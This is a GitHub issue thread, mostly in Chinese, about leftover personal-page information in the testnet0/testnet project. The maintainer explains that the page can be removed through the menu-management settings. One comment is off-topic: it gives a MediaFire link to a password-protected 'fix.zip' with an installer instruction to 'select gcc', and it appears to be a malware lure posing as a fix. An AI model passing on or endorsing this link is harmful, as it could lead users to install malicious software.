### ISSUE TITLE
大佬这些信息是不是忘记清除了啊，我去哪里可以改一下呢

### ISSUE THREAD

**Issue by jonezj** [testnet0/testnet#11]
![1724901711169](https://github.com/user-attachments/assets/b510aacd-c097-4fff-837e-20c1223eb73e)

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by testnet0** [comment]
你好师傅，这块目前没有作用，可以在系统管理-菜单管理里把个人页删除

**Comment by jonezj** [comment]
> 你好师傅，这块目前没有作用，可以在系统管理-菜单管理里把个人页删除

好的谢谢大佬
